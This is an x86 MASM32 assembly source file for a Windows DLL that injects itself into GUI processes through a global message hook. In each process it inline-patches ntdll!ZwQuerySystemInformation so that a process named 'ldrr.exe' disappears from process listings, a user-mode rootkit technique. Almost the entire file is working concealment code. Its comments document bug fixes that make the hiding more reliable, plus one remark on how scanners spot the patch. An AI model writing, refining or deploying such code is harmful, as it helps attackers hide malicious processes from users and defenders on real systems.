.386p
.model flat, stdcall
option casemap:none
;===================================
; Target : 32-bit x86, flat model, stdcall, MASM32 toolchain.
; What   : DLL that is mapped into GUI processes through a WH_GETMESSAGE
;          hook and, in each of them, overwrites the first bytes of
;          ntdll!ZwQuerySystemInformation with a push/ret stub so that
;          SystemProcessInformation results have the "ldrr.exe" entry
;          unlinked (user-mode process hiding).
; Imports are bound straight to their __imp__ thunks (no user32.inc /
; kernel32.inc prototypes), so any new API must be declared here the same way.
;===================================
include \masm32\include\windows.inc
include \masm32\m32lib\masm32.inc
;===================================
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\ntdll.lib
includelib \masm32\lib\advapi32.lib
;===================================
; kernel32
externdef _imp__ExitProcess@4:PTR pr1
ExitProcess equ <_imp__ExitProcess@4>
externdef _imp__SetLastError@4:PTR pr1
SetLastError equ <_imp__SetLastError@4>
externdef _imp__lstrcmpiW@8:PTR pr2
lstrcmpiW equ <_imp__lstrcmpiW@8>
externdef _imp__WriteProcessMemory@20:PTR pr5
WriteProcessMemory equ <_imp__WriteProcessMemory@20>
externdef _imp__ReadProcessMemory@20:PTR pr5
ReadProcessMemory equ <_imp__ReadProcessMemory@20>
; ntdll
externdef _imp__ZwQuerySystemInformation@16:PTR pr4
ZwQuerySystemInformation equ <_imp__ZwQuerySystemInformation@16>
; user32
externdef _imp__SetWindowsHookExA@16:PTR pr4
SetWindowsHookEx equ <_imp__SetWindowsHookExA@16>
externdef _imp__UnhookWindowsHookEx@4:PTR pr1
UnhookWindowsHookEx equ <_imp__UnhookWindowsHookEx@4>
externdef _imp__CallNextHookEx@16:PTR pr4
CallNextHookEx equ <_imp__CallNextHookEx@16>
externdef _imp__MessageBoxW@16:PTR pr4
MessageBox equ <_imp__MessageBoxW@16>
; advapi32
externdef _imp__RegEnumValueW@32:PTR pr8
RegEnumValueW equ <_imp__RegEnumValueW@32>
; SYSTEM_PROCESSES and friends come from here.
include DeepKernel.ash
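;-----------------------------------------------------------------------
; Patch stub written over the first bytes of ZwQuerySystemInformation:
;   68 xx xx xx xx   push imm32   (absolute address of NewZQSI)
;   C3               ret          (transfers control to it)
; An absolute transfer that needs no relative displacement.  The name
; "far_jmp" is historical: this is a near push/ret, not an x86 far jump.
; Detection note: an ntdll export whose first bytes read 68 .. .. .. .. C3
; (or whose in-memory text differs from the on-disk image) is exactly what
; a hook scanner looks for.
;-----------------------------------------------------------------------
far_jmp struct
PushOp  DB 068h                     ; opcode: push imm32
PushArg DD ?                        ; filled in by SetHookZQSI with offset NewZQSI
RetOp   DB 0c3h                     ; opcode: ret
far_jmp ends

.data?
hDLL     DD ?                       ; this DLL's module handle (per-process copy, see LibMain)
hHookMsg DD ?                       ; handle from SetWindowsHookEx(WH_GETMESSAGE), 0 if none

.data
; Original prologue bytes of ZwQuerySystemInformation.  Sized from the stub
; so the save/restore length can never drift from the patch length
; (previously a hard-coded 6 in several places).
OldCode  DB (sizeof far_jmp) dup(?)
; Stub instance; opcodes take the struct defaults, PushArg is set at hook time.
FAR_JUMP far_jmp <>
; L"ldrr.exe" -- the image name that HideProcess unlinks from process lists.
; Kept as UTF-16LE bytes with a double NUL terminator (runtime string, do not alter).
wszLoaderName DB "l",0,"d",0,"r",0,"r",0,".",0,"e",0,"x",0,"e",0,0,0

.code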
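;-----------------------------------------------------------------------
; HideProcess(ProcName, Tasks)  -- stdcall, two DWORD parameters
;   ProcName : PCWSTR, NUL-terminated image name to hide (compared
;              case-insensitively with lstrcmpiW)
;   Tasks    : SYSTEM_PROCESSES buffer as filled by ZwQuerySystemInformation
;              (SystemProcessInformation).  Entries are chained by the DWORD
;              at offset 0 (byte delta to the next entry, 0 = last entry).
; Every entry whose ProcessName.Buffer equals ProcName is unlinked by folding
; its delta into the predecessor's delta (or terminating the chain at the
; predecessor when the hidden entry was the last one).  Changes from the
; original: all matches are hidden, not just the first; an entry with a NULL
; name buffer is skipped instead of being handed to lstrcmpiW; a match on the
; very first entry is left alone (there is no predecessor to relink -- the
; original wrote through an uninitialised edi in that case); esi/edi are
; preserved as the stdcall ABI requires.
; Returns nothing meaningful in eax.
;-----------------------------------------------------------------------
HideProcess proc uses esi edi ProcName:DWord, Tasks:DWord
    mov     esi, [Tasks]                ; esi = current entry
    xor     edi, edi                    ; edi = predecessor entry (0 = none yet)
@@Next:
    ; No name buffer: nothing to compare, keep the entry.
    cmp     DWord ptr [esi+SYSTEM_PROCESSES.ProcessName.Buffer], 0
    jz      short @@Advance
    invoke  lstrcmpiW, [esi+SYSTEM_PROCESSES.ProcessName.Buffer], [ProcName]
    test    eax, eax
    jnz     short @@Advance             ; not the target
    test    edi, edi
    jz      short @@Advance             ; head entry: cannot be unlinked, see header
    ; Unlink: pred.delta += cur.delta, or pred.delta = 0 if cur is the tail.
    mov     edx, DWord ptr [esi]
    test    edx, edx
    jz      short @@Truncate
    add     DWord ptr [edi], edx
    add     esi, edx                    ; continue from the entry now following pred;
    jmp     @@Next                      ; edi stays the predecessor
@@Truncate:
    mov     DWord ptr [edi], 0          ; hidden entry was last: chain now ends at pred
    jmp     short @@Done
@@Advance:
    mov     ecx, DWord ptr [esi]
    test    ecx, ecx
    jz      short @@Done                ; delta 0 = end of list
    mov     edi, esi
    add     esi, ecx
    jmp     @@Next
@@Done:
    ret
HideProcess endp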
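;-----------------------------------------------------------------------
; NewZQSI(P1, P2, P3, P4) -- replacement for ZwQuerySystemInformation.
; stdcall with the same four DWORD parameters and NTSTATUS return in eax:
;   P1 = SystemInformationClass, P2 = SystemInformation buffer,
;   P3 = SystemInformationLength, P4 = ReturnLength (may be NULL).
; Control arrives through the push/ret stub SetHookZQSI wrote over the real
; function, so the stack looks like an ordinary call.  Sequence:
;   1. put the saved original bytes back,
;   2. call the real function,
;   3. re-install the stub,
;   4. if the request was SystemProcessInformation and it succeeded, unlink
;      the loader's entry from the returned list.
; Bug fixed: the success check used to read eax AFTER the re-hook
; WriteProcessMemory call, i.e. it tested WriteProcessMemory's BOOL instead
; of the NTSTATUS, so HideProcess also walked the buffer after e.g.
; STATUS_INFO_LENGTH_MISMATCH, when its contents are undefined.  The status
; is now captured before anything else runs.
; KNOWN LIMITATION (not fixed here): steps 1-3 form a non-atomic
; unhook/re-hook window.  Another thread calling ZwQuerySystemInformation
; during that window either bypasses the filter or executes a half-written
; stub.  Only a real trampoline (relocating the displaced instructions)
; avoids this.  WriteProcessMemory results are not checked: INVALID_HANDLE_VALUE
; (-1) is the current-process pseudo handle and the call is expected to
; succeed on our own image; a failure here has no sensible recovery.
;-----------------------------------------------------------------------
SYSTEM_PROCESS_INFORMATION_CLASS equ 5          ; SystemProcessInformation
NT_MAX_SUCCESS_STATUS equ 03fffffffh            ; original threshold: informational/
                                                ; warning/error statuses are all above it
NewZQSI proc P1:DWord, P2:DWord, P3:DWord, P4:DWord
    LOCAL Bytes:DWord
    LOCAL Status:DWord
    invoke  WriteProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], offset OldCode, sizeof OldCode, addr Bytes
    invoke  ZwQuerySystemInformation, [P1], [P2], [P3], [P4]
    mov     Status, eax                 ; NTSTATUS; must be saved before the next call clobbers eax
    pusha                               ; eax (the status) is restored to the caller by popa
    invoke  WriteProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], offset FAR_JUMP, sizeof OldCode, addr Bytes
    cmp     DWord ptr [P1], SYSTEM_PROCESS_INFORMATION_CLASS
    jnz     short @@Done                ; not a process list
    cmp     Status, NT_MAX_SUCCESS_STATUS
    ja      short @@Done                ; call failed: buffer contents are undefined
    cmp     DWord ptr [P2], 0
    jz      short @@Done                ; nothing to filter
    invoke  HideProcess, offset wszLoaderName, [P2]
@@Done:
    popa
    ret
NewZQSI endp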
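;-----------------------------------------------------------------------
; HookProc(Code, wParam, lParam) -- WH_GETMESSAGE hook procedure.
; It exists only so that SetWindowsHookEx has a procedure to register,
; which is what gets this DLL mapped into other GUI processes; it filters
; nothing.  It must still forward to the next hook in the chain: the
; original returned 0 without CallNextHookEx, which silently disables every
; WH_GETMESSAGE hook installed after this one.  hHookMsg is this process's
; own hook handle (0 if SetWindowsHookEx failed); modern Windows ignores
; the hhk argument of CallNextHookEx, so 0 is tolerated there.
; Returns eax = result of the next hook.
;-----------------------------------------------------------------------
HookProc proc Code:DWord, wParam:DWord, lParam:DWord
    invoke  CallNextHookEx, [hHookMsg], [Code], [wParam], [lParam]
    ret
HookProc endp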
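;-----------------------------------------------------------------------
; SetHookZQSI() -- save the first sizeof(far_jmp) bytes of this process's
; ZwQuerySystemInformation (address taken from our import entry, i.e.
; ntdll's export) into OldCode, then overwrite them with the
; "push NewZQSI / ret" stub.
; Returns eax = 1 on success, 0 if the read or the write failed.  On a
; failed or short read nothing is written, so OldCode never holds junk that
; a later restore would copy back over ntdll (the original patched
; unconditionally and ignored both return values).
; Not idempotent: a second call in the same process would save the stub
; itself as the "original" bytes.  LibMain calls it once per process.
; Caveat: this is a destructive overwrite, not a trampoline -- it assumes
; no thread is executing those bytes and it may split whatever instruction
; straddles the patch boundary; the displaced code is only ever run after
; NewZQSI has restored it.
;-----------------------------------------------------------------------
SetHookZQSI proc
    LOCAL Bytes:DWord
    invoke  ReadProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], addr OldCode, sizeof OldCode, addr Bytes
    test    eax, eax
    jz      short @@Fail
    cmp     Bytes, sizeof OldCode
    jne     short @@Fail                ; short read: do not patch on a half-saved prologue
    mov     [FAR_JUMP.PushOp], 068h     ; push imm32
    mov     [FAR_JUMP.PushArg], offset NewZQSI
    mov     [FAR_JUMP.RetOp], 0c3h      ; ret -> lands in NewZQSI
    invoke  WriteProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], offset FAR_JUMP, sizeof far_jmp, addr Bytes
    test    eax, eax
    jz      short @@Fail
    mov     eax, 1
    ret
@@Fail:
    xor     eax, eax
    ret
SetHookZQSI endp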
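;-----------------------------------------------------------------------
; LibMain(hInstDLL, reason, unused) -- DllMain.
; DLL_PROCESS_ATTACH: remember the module handle, register a WH_GETMESSAGE
;   hook (this is what gets the DLL loaded into other GUI processes), then
;   patch this process's ZwQuerySystemInformation via SetHookZQSI.
; DLL_PROCESS_DETACH: remove the message hook and put the original bytes
;   back.  The original never restored them, so after unload ntdll kept
;   jumping to the now-unmapped NewZQSI and the next process-list query
;   crashed the host.
; Always returns TRUE.  Removed: the duplicated hDLL store and the unused
; hMutex/trId locals.
; NOTE(review): hDLL and hHookMsg live in ordinary per-process .data (no
; shared section), so "hDLL == NULL" is true in every process the DLL lands
; in and each of them installs its own global hook.  Calling
; SetWindowsHookEx from DllMain also runs under the loader lock, which
; Microsoft documents as unsafe.  Both are design choices of this tool and
; are only flagged here, not changed.
;-----------------------------------------------------------------------
LibMain proc hInstDLL:DWORD, reason:DWORD, unused:DWORD
    LOCAL Bytes:DWord
    .if reason == DLL_PROCESS_ATTACH
        .if hDLL == NULL
            mov     eax, hInstDLL
            mov     hDLL, eax
            invoke  SetWindowsHookEx, WH_GETMESSAGE, offset HookProc, hDLL, NULL
            mov     hHookMsg, eax       ; 0 if the hook could not be installed
        .endif
        invoke  SetHookZQSI
    .elseif reason == DLL_PROCESS_DETACH
        .if hHookMsg != NULL
            invoke  UnhookWindowsHookEx, hHookMsg
            mov     hHookMsg, 0
        .endif
        ; Restore only if SetHookZQSI built the stub and OldCode holds a
        ; plausible saved prologue (a first byte of 00h would mean the read
        ; never happened); otherwise we would stamp zeros into ntdll.
        .if (FAR_JUMP.PushArg == offset NewZQSI) && (OldCode != 0)
            invoke  WriteProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], offset OldCode, sizeof OldCode, addr Bytes
            mov     FAR_JUMP.PushArg, 0
        .endif
    .endif
    mov     eax, TRUE
    ret
LibMain endp
end LibMain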